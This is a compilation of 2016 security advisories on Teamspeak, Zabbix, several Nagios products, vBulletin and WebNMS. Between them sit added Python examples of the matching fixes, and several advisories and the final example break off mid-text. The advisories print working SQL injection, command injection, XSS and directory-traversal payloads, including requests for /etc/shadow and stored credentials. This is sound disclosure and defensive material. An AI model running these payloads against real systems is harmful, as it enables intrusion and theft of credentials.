[FD] RCE in Teamspeak 3 server

2016-08-12 Thread Hanz Jenson
While auditing the Teamspeak 3 server I've discovered several 0-day
vulnerabilities which I'll describe in detail in this advisory. They exist in
the newest version of the server, version 3.0.13.

I found 10 vulnerabilities. Some of these are critical and allow remote code
execution. For the average user, that means that these vulnerabilities can be
exploited by a malicious attacker in order to take over any Teamspeak server,
not only becoming serveradmin, but getting a shell on the affected machine.

Here's the output of an exploit which uses two of the vulnerabilities:

$ python exploit_teamspeak.py
leaking distinct stack pointers
 '\xa2'  '\x9a'  '\x8a' . '_' .. '\xa0'
got a ptr: 0x7fa29a8a5fa0
 '\xa2'  '\x9a'  '\x9a'  'o' ... '\xa0'
got a ptr: 0x7fa29a9a6fa0
 '\xa2'  '\x9a'  '\xaa' . '\x7f'  '\xa0'
got a ptr: 0x7fa29aaa7fa0
stack ptr: 0x7fa29a8a5fa0
assumed stack base: 0x7fa29a5a5000
sleeping a bit to avoid flood detection...
initializing stack sprayers
spraying the stacks
doing some magic.

Got a shell from ('127.0.0.1', 38416)
ts3@ts3:/home/ts3/teamspeak3-server$


I won't release the exploit anytime soon, but I will note that writing one is
a great learning experience.


Next I'll describe my findings. I'll be referring to function names. The
Teamspeak developers strip their binaries of symbols, but they messed up once
and forgot to do so.

If you want to follow along at home, I'm sure your favorite search engine can
help you find the non-stripped server binary.

Now on to the vulns!


--- vuln 1: race condition leading to use-after-free ---

The ts3 server is threaded. When accessing objects like a Client or a Channel,
which can be shared among threads, it's necessary to hold a mutex. However the
function VirtualServerBase::sendCommandLowPacket drops its mutex before
accessing a Client object. Here's the vulnerable code:

0x49d26d:
    call    pthread_mutex_unlock
    mov     rdi, client

    ; this will mov rax, [rdi+0F0h]
    call    Client::getTransmissionReceiveBase(void)

    mov     rcx, [rax]
    mov     rdx, [rbx+VirtualServer.vsb.vserv_id]
    mov     rdi, rax
    mov     rsi, r14
    call    qword ptr [rcx+58h]

As we can see, the mutex is unlocked and then a TransmissionReceiveBase struct
is taken out of the Client. Then its vtable is used for a call. Looking at
the kernel source we see that, at least on Linux, _pthread_mutex_unlock will
swap out the current thread if there's another thread blocked waiting for the
mutex.

This other thread could then free the Client and place controlled data on top
of the freed block. When the first thread runs again, we control the
TransmissionReceiveBase object completely. The indirect call through its
vtable allows us to get $pc.

This is one of the vulnerabilities used in the exploit above.


--- vuln 2: disclosure of a partially uninitialized stack buffer ---

When a client first connects to the server, it sends over an IV. The IV is
base64-encoded. The server decodes it in VirtualServerBase::clientInitIV.
However the server ignores the return value of Crypt::decodeBase64 which is
the decoded length. Instead it assumes that the length is always 10 bytes.

If the client only encodes e.g. 9 bytes and sends them over, one byte of the
IV will be uninitialized. The client can guess this byte. Only a correct guess
will prevent later cryptographic operations from failing. Thus the client can
deduce the byte. It can repeat the process, sending over only 8 bytes, etc.
This lets us do a byte-at-a-time leak from the stack.

Specifically it lets us leak a stack pointer, beating ASLR. This was used in
the exploit above.


--- vuln 3: disclosure of heap memory ---

The ts3 server compresses command packets with the "qlz" library. However a
known vulnerability resides in one of the older versions of this library.
This was already fixed in the newest qlz release (a beta release). However the
ts3 server uses an older version of this library.

The vulnerability is described here:

http://blog.frama-c.com/index.php?post/2011/04/05/QuickLZ-1

But it's straightforward to find for anyone looking at qlz's source code. You
don't need any fancy "software analyzer" to find it, like in that silly blog
post.

The vulnerability is qlz-specific and essentially allows you to "decompress"
data, but much of the decompressed data is actually uninitialized.

Why is this a problem for the ts3 server? Because we can send a short
compressed command packet over which starts with "some_command return_code=".
When we use this vuln and the packet is decompressed, the following bytes will
be included in the packet. So the packet that ts3 sees is "some_command
return_code=".

Since the return_code parameter is reflected back to us, this lets us leak
data from the heap.




[FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

2016-08-12 Thread 1n3
=
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com 
Patch link: https://support.zabbix.com/browse/ZBX-11023 
Credit: 1N3@CrowdShield 
==
 
 
Vendor Description:
=
Zabbix is an open source availability and performance monitoring solution. 
 
 
Vulnerability Overview:
=
Zabbix 2.2.x, 3.0.x and trunk suffer from a remote SQL injection vulnerability 
due to a failure to sanitize input in the toggle_ids array in the latest.php 
page.
 
 
Business Impact:
=
By exploiting this SQL injection vulnerability, an authenticated attacker (or 
guest user) is able to gain full access to the database. This would allow an 
attacker to escalate their privileges to a power user, compromise the database, 
or execute commands on the underlying database operating system.
 
Because of the functionalities Zabbix offers, an attacker with admin privileges 
(depending on the configuration) can execute arbitrary OS commands on the 
configured Zabbix hosts and server. This results in a severe impact to the 
monitored infrastructure.
 
Although the attacker needs to be authenticated in general, the system could 
also be at risk if the adversary has no user account. Zabbix offers a guest 
mode which provides a low privileged default account for users without 
password. If this guest mode is enabled, the SQL injection vulnerability can be 
exploited unauthenticated.
 
 
Proof of Concept:
=
 
latest.php?output=ajax==toggle_open_state=1_ids[]=15385);
 select * from users where (1=1

Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, 
idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users 
where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → 
DBexecute() in 
/home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185


Disclosure Timeline:
=

7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after 
a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Nagios Incident Manager Multiple Vulnerabilities

2016-08-12 Thread Francesco Oddo
(, ) (,
  .   '.' ) ('.',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _/  / _  \     _
 \  \==/ /_\  \ _/ ___\/  _ \ / \
 /   \/   |\\  \__(  <_> )  Y Y  \
/__  /\___|__  / \___  >/|__|_|  /
\/ \/.-.\/ \/:wq
(x.0)
  '=.|w|.='
  _=''"''=.

presents..

Nagios Incident Manager Multiple Vulnerabilities
Affected versions: Nagios Incident Manager <= 2.0.0

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf

+---+
|Description|
+---+
The Nagios Incident Manager application is vulnerable to multiple
vulnerabilities, including remote code execution via command injection,
SQL injection and stored cross-site scripting.


++
|Exploitation|
++
==Command Injection==
Multiple command injection vulnerabilities exist within the incident
report file generation functionality as user input is passed to system
shell calls without validation. A limited non-administrative user, who
by default does not have permissions to add custom MIME types for
incident file attachments, can exploit these vulnerabilities to obtain
remote code execution on the Incident Manager system as the ‘apache’ user.

URL => /nagiosim/reports/download//mttr/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//closed/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//first_response/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo

URL => /nagiosim/reports/download//general/
Method => GET
POC Payload => start_date=2016-05-06_date=2016-05-06[]=2"
"";{touch,/tmp/MYFILE};echo


==SQL Injection==
The Nagios IM admin functionality to update the application settings is
vulnerable to an SQL Injection vulnerability via error-based payloads.
An attacker can inject into the ‘timezone’ POST parameter and retrieve
sensitive information from the application MySQL database.

URL => /nagiosim/admin/settings
Method => POST
Parameter => timezone
Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '


==Stored Cross-Site Scripting==
Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
web interface, allowing a standard user to insert malicious JavaScript
payloads into administrative and non-administrative application
functionality. This attack vector could be used by an authenticated
attacker with standard user privileges to hijack the session of an admin
user and extend their permissions within the application (e.g. adding
PHP as a valid MIME type for file attachments).

URL => /nagiosim/incidents/add
Method => POST
Parameters => title, summary, priority, file_description, status
Render => /nagiosim/incidents, /nagiosim/incidents/details/
POC Payload => alert(1)

URL => /nagiosim/api/incidents//messages
Method => POST
Parameters => title
Render => /nagiosim/incidents/details/
POC Payload => alert(1)

URL => /nagiosim/profile
Method => POST
Parameters => username, first_name, last_name
Render => /nagiosim/admin/users, Global Menu Banner (username)
POC Payload => alert(1)

+--+
| Solution |
+--+
Upgrade to Nagios Incident Manager 2.0.1


++
|  Timeline  |
++
2/06/2016 - Initial disclosure to vendor
3/06/2016 - Vendor acknowledges receipt of advisory
8/07/2016 - Vendor releases patched software version (2.0.1)
11/08/2016 – Public disclosure



++
| Additional |
++
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf



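The Zabbix advisory above (toggle_ids[] pasted into an INSERT, with the debug log showing the stacked SELECT) and the Nagios IM timezone injection both come down to request values reaching the SQL text unchanged. The following is an added example, not Zabbix's or Nagios' code: it shows the vulnerable string-building pattern next to a hardened version that validates the integer array, allowlists the timezone string and binds every value as a parameter. It assumes an in-memory sqlite3 database as a stand-in for the MySQL driver, a constructed allowlist of timezone names, and a simplified profiles/settings schema; profileid values are constructed.

```python
import re
import sqlite3

# Constructed allowlist standing in for a real tz database lookup.
TIMEZONE_ALLOWLIST = frozenset({"UTC", "US/Eastern", "Pacific/Samoa", "Europe/Berlin"})

# A plain non-negative integer of at most 10 digits, nothing else.
_INT_RE = re.compile(r"0|[1-9][0-9]{0,9}")


def parse_toggle_ids(raw_ids):
    """Validate every toggle_ids[] entry before it gets near the database."""
    ids = []
    for value in raw_ids:
        if not isinstance(value, str) or _INT_RE.fullmatch(value) is None:
            raise ValueError(f"toggle_ids[] entry is not a plain integer: {value!r}")
        ids.append(int(value))
    return ids


def vulnerable_insert_sql(userid, raw_id):
    """The shape the Zabbix debug log shows: the request value is pasted into
    the statement text, so a value ending in ');' closes the INSERT and
    whatever follows it becomes a second statement."""
    return ("INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) "
            f"VALUES (88, {userid}, 'web.latest.toggle', '1', 2, {raw_id})")


def open_db():
    """In-memory sqlite3 stand-in for the MySQL schema (constructed, simplified)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profiles (profileid INTEGER, userid INTEGER, idx TEXT,
                               value_int TEXT, type INTEGER, idx2 INTEGER);
        CREATE TABLE settings (name TEXT PRIMARY KEY, value TEXT);
        INSERT INTO settings VALUES ('timezone', 'UTC');
    """)
    return conn


def flush_toggles(conn, userid, raw_ids):
    """Hardened flush: validated integers, bound with '?' placeholders.
    Returns the idx2 values actually stored for the user."""
    ids = parse_toggle_ids(raw_ids)
    conn.executemany(
        "INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) "
        "VALUES (?, ?, 'web.latest.toggle', '1', 2, ?)",
        [(88 + n, userid, idx2) for n, idx2 in enumerate(ids)])
    conn.commit()
    return [row[0] for row in conn.execute(
        "SELECT idx2 FROM profiles WHERE userid = ? ORDER BY profileid", (userid,))]


def update_timezone(conn, timezone):
    """Hardened settings update: allowlist first, then a bound parameter.
    A value like \"Pacific/Samoa' AND (SELECT ...\" never matches the allowlist."""
    if timezone not in TIMEZONE_ALLOWLIST:
        raise ValueError(f"unknown timezone: {timezone!r}")
    conn.execute("UPDATE settings SET value = ? WHERE name = 'timezone'", (timezone,))
    conn.commit()
    return conn.execute("SELECT value FROM settings WHERE name = 'timezone'").fetchone()[0]
```

The validation step is what turns the array into integers; the bound parameters are what keep even a rejected-by-mistake string from being parsed as SQL. Both are needed: parameter binding alone would store "15385); select ..." as an opaque value rather than executing it, but it would not keep the profiles table clean.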

[FD] Nagios Network Analyzer Multiple Vulnerabilities

2016-08-12 Thread Francesco Oddo

Nagios Network Analyzer Multiple Vulnerabilities
Affected versions: Nagios Network Analyzer <= 2.2.0

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf

+---+
|Description|
+---+
The Nagios Network Analyzer application is affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection and privilege escalation.

These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.

++
|Exploitation|
++
==Authentication Bypass==
Authentication for the Nagios Network Analyzer web management interface
can be bypassed due to an insecure implementation of the function
validating session cookies within the ‘Session.php’ file. As shown
below, the application uses a base64 encoded serialized PHP string along
with a SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:

 
a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx";
 s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";s:13:"last_activity";
 
i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email";
 
s:30:"xxx...@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";
 
s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession";
 b:1;s:7:"view_id";i:0;}

The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.

Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.

The script on the following page generates session cookies which are
accepted and validated successfully by the application. A ‘user_id’
value of 1 can be used to initiate a session in the context of the admin
user.

[POC - nagiosna_forge_cookie.php]


This vulnerability is present across multiple Nagios products.


==SQL Injection==
Multiple SQL injection vulnerabilities exist in the application web
management interface. An attacker can exploit these vulnerabilities to
retrieve sensitive data from the application MySQL database.

URL =>
/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0%5Bcol%5D=%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)

URL =>
/nagiosna/index.php/api/sources/read?o%5Bcol%5D=%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)

URL => /nagiosna/index.php/admin/globals
Method => POST
Parameter => timezone
POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT
COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS
CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT
0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND '%'=''


==Command Injection==
A command injection vulnerability exists in the function generating PDF
reports for download. Base64 encoded user-supplied input is passed as an
argument to system shell calls without being escaped. An attacker can
inject arbitrary shell commands and obtain remote code execution in the
context of the apache user.

URL => /nagiosna/index.php/download/report/sourcegroup//
Method => GET
POC Payload => q[rid]=5[gid]=1" "";{touch,/tmp/TESTFILE};echo "

URL => /nagiosna/index.php/download/report/source//
Method => GET
POC Payload => q[rid]=5[gid]=1" "";{touch,/tmp/TESTFILE};echo "

Arbitrary code execution in the context of the ‘nna’ user can also be
obtained by abusing the intended functionality to define custom alert
commands. As shown in the next section, this exposes the application to
additional privilege escalation attack vectors.


==Privilege Escalation==
The default application 
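
The command injection findings in the Nagios Incident Manager and Nagios Network Analyzer advisories above share one root cause: request parameters (dates, ids, a base64-wrapped id) are concatenated into a shell command line. The following is an added example, not Nagios' code, of the argv discipline that removes the shell from the picture: each parameter is validated against the exact shape it should have, the command is assembled as a list, and `subprocess.run` is called with `shell=False`, so quotes, semicolons and brace expansions in a value are just bytes of one argument. The report tool path and the option names are hypothetical placeholders; the report-type names are the ones in the Incident Manager URLs.

```python
import base64
import binascii
import datetime
import re
import subprocess
import sys

REPORT_TYPES = frozenset({"mttr", "closed", "first_response", "general"})
REPORT_TOOL = "/opt/example/bin/gen_report"  # hypothetical placeholder path, not Nagios'

_DATE_RE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def validate_date(value):
    """Accept exactly YYYY-MM-DD and a calendar-valid date; anything else is rejected."""
    if not isinstance(value, str) or _DATE_RE.fullmatch(value) is None:
        raise ValueError(f"bad date parameter: {value!r}")
    datetime.date.fromisoformat(value)  # raises ValueError for e.g. 2016-13-40
    return value


def validate_ids(values):
    """Array parameters like '...[]=2' must be small positive integers."""
    ids = []
    for v in values:
        if not isinstance(v, str) or _ID_RE.fullmatch(v) is None:
            raise ValueError(f"bad id parameter: {v!r}")
        ids.append(int(v))
    return ids


def decode_b64_id(value):
    """Base64 transport does not make input trusted: decode strictly, then validate."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"bad base64 parameter: {value!r}") from exc
    return validate_ids([raw.decode("ascii", errors="replace")])[0]


def build_report_argv(report_type, start_date, end_date, ids):
    """Assemble the command as an argv list: no shell, one argument per element."""
    if report_type not in REPORT_TYPES:
        raise ValueError(f"unknown report type: {report_type!r}")
    argv = [REPORT_TOOL, "--type", report_type,
            "--start", validate_date(start_date), "--end", validate_date(end_date)]
    for report_id in validate_ids(ids):
        argv += ["--id", str(report_id)]
    return argv


def run_without_shell(argv):
    """shell=False: metacharacters in any element are never interpreted."""
    result = subprocess.run(argv, shell=False, check=True, capture_output=True, text=True)
    return result.stdout


def echo_argument(payload):
    """Demonstrates the argv discipline with the Python interpreter as the target
    program: the payload comes back verbatim, nothing in it is executed."""
    return run_without_shell(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", payload])
```

`echo_argument` exists only to make the property observable offline: the same string that the advisories' PoC payloads carry arrives in the child as a single literal argument. In the real application the validators would reject it long before any process is spawned, which is the first line of defence; `shell=False` is the second.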

[FD] Nagios Log Server Multiple Vulnerabilities

2016-08-12 Thread Francesco Oddo

Nagios Log Server Multiple Vulnerabilities
Affected versions: Nagios Log Server <= 1.4.1

PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf

+---+
|Description|
+---+
The Nagios Log Server application is affected by multiple security
vulnerabilities, including authentication bypass, stored cross-site
scripting, inconsistent authorization controls and privilege escalation.

These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.


++
|Exploitation|
++
==Authentication Bypass==
Authentication for the Nagios Log Server web management interface can be
bypassed due to an insecure implementation of the function validating
session cookies within the ‘Session.php’ file. As shown below, the
application uses a base64 encoded serialized PHP string along with a
SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:

a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123";
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";
s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user";
s:5:"email";s:16:"t...@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}

The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.

Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.

The script on the following page generates session cookies which are
accepted and validated successfully by the application. A ‘user_id’
value of 1 can be used to initiate a session in the context of the admin
user.

[POC - nagiosls_forge_cookie.php]



This vulnerability is present across multiple Nagios products.


==Stored Cross-Site Scripting==
The Nagios Log Server application does not validate and HTML encode log
data sent by configured sources. This issue is aggravated by the fact
that the application does not maintain a list of authorized log sources,
but instead accepts data from any host connecting to the Nagios Log
Server port responsible for collecting logs (TCP 5544). An attacker can
exploit this vulnerability to send malicious JavaScript code and execute
it in the context of a Nagios Log Server user session as shown below.

[POC STORED XSS]
# echo 'alert("xss")' | nc [TARGET IP] 5544

The payload gets rendered under '/nagioslogserver/dashboard'.

==Inconsistent Authorization Controls==
The Nagios Log Server application provides intended functionality to
define custom alert commands using different configuration options. By
default, only administrative users can define alert commands which
execute scripts on the Log Server filesystem when an alert is triggered.

However, the application does not properly enforce authorization checks
and an attacker can access the same functionality in the context of a
standard user session by providing the correct payload in the ‘alert’
POST parameter. This functionality can be abused to obtain remote code
execution on the target system as the application does not restrict the
script definition to a single folder and an attacker can specify
absolute paths to any script or executable file present on the Log
Server host.

[POC - CREATE COMMAND EXECUTION ALERT]
URL => /nagioslogserver/api/check/create/1
Method => POST
Payload =>
alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1",
"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch",
"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"}


==Privilege Escalation==
The default Log Server application sudoers configuration allows the
‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without
being prompted for a 
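
The authentication bypass described in both the Nagios Network Analyzer and the Nagios Log Server advisories above rests on one design error: the HMAC key is sha1 of the Host header, a value every client supplies. The following is an added example, not Nagios' code, that models that scheme in miniature and places it beside the fix: a random secret generated once and held only on the server, plus a server-side session table so a cookie with a well-formed tag is still not enough on its own. It assumes a JSON body in place of the PHP-serialized array the real cookie carries, and a dict as the session store; host names and session ids are constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets


def derive_key_from_host(host_header):
    """The scheme the advisories describe: MAC key = sha1(Host header).
    Every client sends the Host header, so every client can compute this key."""
    return hashlib.sha1(host_header.encode()).hexdigest()


def new_server_secret():
    """What the key should be: random, generated once at install, kept server-side."""
    return secrets.token_hex(32)


def sign_cookie(session, key):
    """Encode the session dict and append an HMAC-SHA1 tag over the encoded body.
    JSON stands in for the PHP-serialized array of the real cookie (assumption)."""
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    tag = hmac.new(key.encode(), body.encode(), hashlib.sha1).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie, key):
    """Return the session dict if the tag verifies under key, else None.
    compare_digest keeps the comparison constant-time."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key.encode(), body.encode(), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except (ValueError, UnicodeDecodeError):
        return None


def weak_verify(cookie, request_host):
    """Vulnerable check: the verifier derives its key from the request's own
    Host header, so whoever sends the request also chose the key."""
    return verify_cookie(cookie, derive_key_from_host(request_host))


def hardened_verify(cookie, server_secret, session_store):
    """Fixed check: server-held secret, and the session_id must exist server-side
    and belong to the user_id the cookie claims."""
    session = verify_cookie(cookie, server_secret)
    if session is None:
        return None
    session_id = session.get("session_id")
    if session_id not in session_store or session_store[session_id] != session.get("user_id"):
        return None
    return session
```

The server-side lookup is the part that makes the stateless cookie safe even if the secret ever leaks: a tag alone proves the cookie was minted with the key, not that the session was ever issued to anyone.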

[FD] CVE-2016-6483 - vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)

2016-08-12 Thread Dawid Golunski
vBulletin
CVE-2016-6483

vBulletin software is affected by a SSRF vulnerability that allows
unauthenticated remote attackers to access internal services (such as mail
servers, memcached, couchDB, zabbix etc.) running on the server
hosting vBulletin as well as services on other servers on the local
network that are accessible from the target.

The following versions are affected:

vBulletin  <= 5.2.2
vBulletin  <= 4.2.3
vBulletin  <= 3.8.9

Technical details, PoC vBulletin exploits and links to patches provided
by the vendor can be found at:

http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt

-- 
Regards,
Dawid Golunski
http://legalhackers.com



[FD] [CVE-2016-6600/1/2/3]: Multiple vulnerabilities (RCE, file download, etc) in WebNMS Framework 5.2 / 5.2 SP1

2016-08-12 Thread Pedro Ribeiro
tl;dr

RCE, file download, weak encryption and user impersonation, all of which
can be exploited by an unauthenticated attacker in WebNMS Framework 5.2
and 5.2 SP1.

A special thanks to Beyond Security and their SSD program, which helped
disclose the vulnerabilities. See their advisory at
https://blogs.securiteam.com/index.php/archives/2712

My full advisory can be seen below, and a copy can be obtained at the
github repo
https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt

Metasploit modules have also been released.

Regards,
Pedro



>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 04/07/2016 / Last updated: 08/08/2016

>> Background on the affected product:
"WebNMS is an industry-leading framework for building network management
applications. With over 25,000 deployments worldwide and in every Tier 1
Carrier, network equipment providers and service providers can
customize, extend and rebrand WebNMS as a comprehensive Element
Management System (EMS) or Network Management System (NMS).
NOC Operators, Architects and Developers can customize the functional
modules to fit their domain and network. Functional modules include
Fault Correlation, Performance KPIs, Device Configuration, Service
Provisioning and Security. WebNMS supports numerous Operating Systems,
Application Servers, and databases."


>> Summary:
WebNMS contains three critical vulnerabilities that can be exploited by
an unauthenticated attacker: one directory traversal that can be used to
achieve remote code execution, another directory traversal that can be
abused to download any text file in the system and the possibility to
impersonate any user in the system. In addition, WebNMS also stores the
user passwords in a file with a weak obfuscation algorithm that can be
easily reversed.

A special thanks to the SecuriTeam Secure Disclosure programme (SSD),
which performed the disclosure in a responsible manner to the affected
vendor. This advisory can be seen in their blog at
https://blogs.securiteam.com/index.php/archives/2712


>> Technical details:
#1
Vulnerability: Directory traversal in file upload functionality (leading
to remote code execution)
CVE-2016-6600
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FileUploadServlet has a directory traversal vulnerability, that
allows an unauthenticated attacker to upload a JSP file that executes on
the server.
To exploit this vulnerability, simply POST as per the proof of concept
below. The directory traversal is in the "fileName" parameter.

POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1


There are two things to keep in mind for the upload to be successful:
- Only text files can be uploaded, binary files will be mangled.
- In order to achieve code execution without authentication, the files
need to be dropped in ../jsp/ but they can only have the following
names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of
any length.


#2
Vulnerability: Directory traversal in file download functionality
CVE-2016-6601
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. Only text
files can be downloaded properly, any binary file will get mangled by
the servlet and downloaded incorrectly.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FetchFile servlet has a directory traversal vulnerability that can
be abused by an unauthenticated attacker to download arbitrary files
from the WebNMS host. The vulnerable parameter is "fileName" and a proof
of concept is shown below.

GET /servlets/FetchFile?fileName=../../../etc/shadow


#3
Vulnerability: Weak obfuscation algorithm used to store passwords
CVE-2016-6602
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory)
contains entries with all the usernames and passwords in the server:



The algorithm used to obfuscate is convoluted but easy to reverse
engineer. The passwords above are "guest" for the "guest" user and
"admin" for the "root" user. A Metasploit module implementing the
deobfuscation algorithm has been released.

This vulnerability can be combined with #2 and allow an unauthenticated
attacker to obtain credentials for all user accounts:
GET /servlets/FetchFile?fileName=conf/securitydbData.xml


#4
Vulnerability: User account impersonation / hijacking
CVE-2016-6603
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

It is possible to impersonate any user in WebNMS by simply setting the
"UserName" HTTP header when 
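
Findings #1 and #2 above are both directory traversals through a "fileName" parameter, one on upload and one on download. The following is an added example, not WebNMS code, of the check that closes both: resolve the requested name under the served directory with `os.path.realpath` and refuse anything whose resolved path is not inside it, then, for uploads, add an extension allowlist so a file that does land inside the tree still cannot be a server-executed page. The directory tree, the file names and the allowlist are constructed for the demo; `run_demo` builds them in a temporary directory.

```python
import os
import tempfile

ALLOWED_UPLOAD_EXT = frozenset({".txt", ".csv", ".log"})  # constructed allowlist


def resolve_inside(base_dir, requested_name):
    """Resolve requested_name under base_dir and refuse anything that escapes it.
    realpath() normalises '..' segments and follows symlinks, so a link inside
    base_dir that points outside is rejected too; an absolute requested_name
    makes os.path.join discard base_dir and is rejected by the same comparison."""
    if not requested_name:
        raise PermissionError("empty file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested_name))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes base directory: {requested_name!r}")
    return target


def fetch_file(base_dir, requested_name):
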